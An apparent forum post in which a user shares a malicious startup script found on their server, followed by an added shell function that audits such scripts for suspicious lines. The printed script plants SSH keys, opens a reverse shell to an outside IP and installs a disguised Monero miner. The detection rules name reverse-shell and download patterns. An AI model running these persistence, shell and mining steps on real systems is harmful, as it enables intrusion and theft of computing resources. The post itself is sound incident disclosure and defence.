Posts posted by JackDewhurst

  1. On 2/5/2021 at 3:03 PM, trurl said:

    And the few plugins you have I don't think use that so I don't know why it would still be running.

     

    Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! Full file contents below:
     

     

    #!/bin/bash
    # Start the Management Utility
    /usr/local/sbin/emhttp &
    mkdir /root/.ssh
    chmod 700 /root/.ssh
    cp /boot/config/ssh/authorized_keys /root/.ssh/
    chmod 600 /root/.ssh/authorized_keys
    nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
    cd /dev/shm
    wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
    tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
    cd xmrig-6.7.0/
    mv xmrig /usr/bin/mysql_daemon
    mkdir -p /etc/mysql/conf.d
    echo '{
        "autosave": true,
        "background": true,
        "cpu": {
            "enabled": true,
            "max-threads-hint": 50
        },
        "max-cpu-usage": 25,
        "cpu-priority": 1,
        "opencl": false,
        "cuda": false,
        "pools": [
            {
                "url": "pool.minexmr.com:443",
                "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
                "keepalive": true,
                "tls": true
            }
        ]
    }' > /etc/mysql/conf.d/.config.json
    /usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
    rm -r /dev/shm/xmrig-6.7.0
    rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz

     

    Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc.
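A defensive check based on the file above, added here as an example and not part of the original post: it flags non-comment lines in a startup script that match the behaviours visible in that file (a `/dev/tcp` redirection, a download, staging in `/dev/shm`, a binary moved into `/usr/bin`, miner strings). The function names, rule labels, regexes and the sample file (placeholder address and URL) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a startup script such as /boot/config/go.
# Rule labels and regexes are illustrative assumptions, not a complete list.
# Usage: audit_go_file /boot/config/go

# audit_go_file FILE
# Prints "LINE:LABEL" for each non-comment line that matches a rule.
# Returns 0 when nothing is flagged, 1 otherwise.
audit_go_file() {
    _file=$1
    _found=$(
        # Each rule is "label|extended-regex"; read keeps the rest of the
        # line (including any further '|') in the last variable.
        while IFS='|' read -r _label _regex; do
            grep -nE -- "$_regex" "$_file" |
                grep -vE '^[0-9]+:[[:space:]]*#' |
                sed -E "s/^([0-9]+):.*/\1:$_label/"
        done <<'RULES' | sort -t: -k1,1n -k2,2
reverse-shell|/dev/tcp/
remote-download|(wget|curl)[[:space:]].*https?://
tmpfs-staging|/dev/shm
system-path-drop|(mv|cp)[[:space:]].*[[:space:]]/usr/(s?bin|local/s?bin)/
miner-string|xmrig|minexmr|stratum
detached-process|(^|[[:space:]])nohup[[:space:]]
RULES
    )
    [ -z "$_found" ] && return 0
    printf '%s\n' "$_found"
    return 1
}

# Constructed sample modelled on the post; 192.0.2.10 and example.invalid
# are placeholders, and the shell command is deliberately abbreviated.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
nohup /bin/bash -c "... /dev/tcp/192.0.2.10/PORT ..." &
cd /dev/shm
wget https://example.invalid/miner.tar.gz
mv xmrig /usr/bin/mysql_daemon
EOF
}
```

A hit means the line needs a human look, not that it is malicious; a stock go file contains only the `emhttp` line and produces no output.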